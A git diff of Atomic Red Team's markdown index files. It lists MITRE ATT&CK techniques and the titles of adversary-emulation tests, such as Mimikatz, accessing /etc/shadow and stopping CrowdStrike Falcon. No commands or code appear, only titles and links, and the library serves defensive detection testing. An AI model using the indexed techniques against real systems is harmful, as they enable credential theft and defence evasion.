+- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
+# reconnaissance
+- T1595 Active Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.004 CDNs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.001 Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.002 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.003 Employee Names [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.003 Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.001 Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.004 Network Topology [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598 Phishing for Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593.002 Search Engines [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593.001 Social Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.002 Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.002 WHOIS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# execution
- [T1059.002 AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
@@ -1094,6 +1272,7 @@
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
+- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.001 PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
@@ -1119,6 +1298,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
@@ -1128,6 +1308,7 @@
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
@@ -1135,6 +1316,7 @@
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
+ - Atomic Test #3: Extract Memory via VBA [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
@@ -1259,69 +1441,6 @@
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# collection
-- [T1560 Archive Collected Data](../../T1560/T1560.md)
- - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
-- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- - Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
-- [T1123 Audio Capture](../../T1123/T1123.md)
- - Atomic Test #1: using device audio capture commandlet [windows]
-- [T1119 Automated Collection](../../T1119/T1119.md)
- - Atomic Test #1: Automated Collection Command Prompt [windows]
- - Atomic Test #2: Automated Collection PowerShell [windows]
- - Atomic Test #3: Recon information for export with PowerShell [windows]
- - Atomic Test #4: Recon information for export with Command Prompt [windows]
-- [T1115 Clipboard Data](../../T1115/T1115.md)
- - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- - Atomic Test #3: Execute commands from clipboard [macos]
-- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
-- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- - Atomic Test #1: AppleScript - Prompt User for Password [macos]
- - Atomic Test #2: PowerShell - Prompt User for Password [windows]
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- - Atomic Test #1: Input Capture [windows]
-- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- - Atomic Test #1: Stage data from Discovery.bat [windows]
- - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
-- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
- - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
-- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1113 Screen Capture](../../T1113/T1113.md)
- - Atomic Test #1: Screencapture [macos]
- - Atomic Test #2: Screencapture (silent) [macos]
- - Atomic Test #3: X Windows Capture [linux]
- - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- - Atomic Test #5: Windows Screencapture [windows]
-- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# exfiltration
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
@@ -1345,6 +1464,7 @@
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 282b47c5..090af769 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -7,6 +7,7 @@
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
@@ -38,6 +39,7 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -50,10 +52,11 @@
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
@@ -93,6 +96,7 @@
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
@@ -101,6 +105,8 @@
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
@@ -112,6 +118,7 @@
- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -126,6 +133,7 @@
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -145,6 +153,44 @@
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+# collection
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
+ - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
+ - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
+ - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
+ - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
+- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1115 Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
+ - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1113 Screen Capture](../../T1113/T1113.md)
+ - Atomic Test #3: X Windows Capture [linux]
+ - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -171,6 +217,8 @@
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable iptables firewall [linux]
@@ -180,6 +228,7 @@
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -189,14 +238,14 @@
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- - Atomic Test #1: Disable history collection [linux, macos]
- - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
+ - Atomic Test #1: Disable history collection [linux, macos]
+ - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
@@ -225,14 +274,21 @@
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
+- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as Linux crond process. [linux]
@@ -256,6 +312,7 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
+- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
@@ -266,9 +323,11 @@
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
@@ -296,6 +355,7 @@
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1489 Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
@@ -313,6 +373,7 @@
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1087.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -368,6 +429,83 @@
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+# resource-development
+- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
